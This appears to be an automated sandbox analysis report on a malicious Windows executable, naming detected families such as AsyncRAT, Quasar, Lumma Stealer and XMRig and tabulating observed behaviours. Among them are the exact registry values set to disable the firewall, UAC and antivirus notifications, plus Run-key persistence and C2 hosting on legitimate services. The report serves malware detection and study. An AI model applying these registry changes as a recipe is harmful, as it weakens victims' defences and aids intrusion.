Analysis Overview
SHA256
07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a
Threat Level: Known bad
The file 07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe was found to be: Known bad.
Malicious Activity Summary
CrimsonRat
Detect Xworm Payload
Quasar family
Danabot family
xmrig
Lokibot
Phemedrone
Modifies firewall policy service
Crimsonrat family
AsyncRat
Silverrat family
Modiloader family
CrimsonRAT main payload
Suspicious use of NtCreateUserProcessOtherParentProcess
ModiLoader, DBatLoader
Quasar payload
Amadey family
Xworm
Xworm family
Phemedrone family
Lumma Stealer, LummaC
Sality family
Lumma family
Sharpstealer family
Sality
Amadey
Xmrig family
UAC bypass
Asyncrat family
Quasar RAT
Windows security bypass
Sharp Stealer
Danabot
SilverRat
XMRig Miner payload
Lokibot family
ModiLoader First Stage
Async RAT payload
Possible privilege escalation attempt
Uses browser remote debugging
Blocklisted process makes network request
Stops running service(s)
Downloads MZ/PE file
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Checks computer location settings
Themida packer
Loads dropped DLL
Executes dropped EXE
Windows security modification
Modifies file permissions
Reads user/profile data of web browsers
Uses the VBS compiler for execution
VMProtect packed file
Obfuscated with Agile.Net obfuscator
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Indicator Removal: File Deletion
Checks whether UAC is enabled
Accesses Microsoft Outlook profiles
AutoIT Executable
Drops file in System32 directory
UPX packed file
Drops autorun.inf file
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
Detects Pyinstaller
Uses Volume Shadow Copy service COM API
outlook_win_path
System policy modification
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy WMI provider
Delays execution with timeout.exe
Uses Task Scheduler COM API
outlook_office_path
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-26 02:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-26 02:42
Reported
2025-03-26 02:45
Platform
win7-20240903-en
Max time kernel
10s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
CrimsonRAT main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
CrimsonRat
Crimsonrat family
Danabot
Danabot family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
ModiLoader, DBatLoader
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Modiloader family
Phemedrone
Phemedrone family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sharp Stealer
Sharpstealer family
SilverRat
Silverrat family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3040 created 492 | N/A | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | C:\Windows\system32\lsass.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Xworm
Xworm family
ModiLoader First Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Stops running service(s)
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek¸ßÇåÎúÒôƵ¹ÜÀÃÆ÷ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\jCMCgXiSHJ = "C:\\Users\\Admin\\AppData\\Roaming\\qEMFsTeRPC\\cGEDpDSLzj.exe" | C:\Users\Admin\AppData\Local\Temp\2020.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTWRM = "C:\\Users\\Admin\\dane\\0a-PORNOSKI.exe" | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\SVRNT = "C:\\Users\\Admin\\dane\\smss.exe" | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Installer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Installer.exe" | C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 5.tcp.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 5.tcp.ngrok.io | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | D:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | \??\Z:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | \??\Y:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | \??\E:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | C:\Users\Admin\dane\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | C:\Users\Admin\dane\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | \??\E:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | \??\G:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | \??\Z:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | \??\Y:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File opened for modification | \??\G:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| File created | D:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\d3dx9_43.dll | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| File created | C:\Windows\System32\LogonUI.exe | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| File opened for modification | C:\Windows\System32\LogonUI.exe | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 896 set thread context of 988 | N/A | C:\Users\Admin\AppData\Local\Temp\2020.exe | C:\Users\Admin\AppData\Local\Temp\2020.exe |
| PID 2744 set thread context of 2876 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\PROGRA~3\Hdlharas\dlrarhsiva.exe | C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe | N/A |
| File opened for modification | C:\PROGRA~3\Hdlharas\dlrarhsiva.exe | C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\psychosomaticDLL.dll | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| File opened for modification | C:\Windows\SYSTEM.INI | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Launches sc.exe
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\amadey.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DanaBot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2020.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2020.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\a5410c88f1\bween.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nigga.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel = "1" | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Direct3D\MostRecentApplication\Name = "psychosomatic.RAT.exe" | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\System | C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
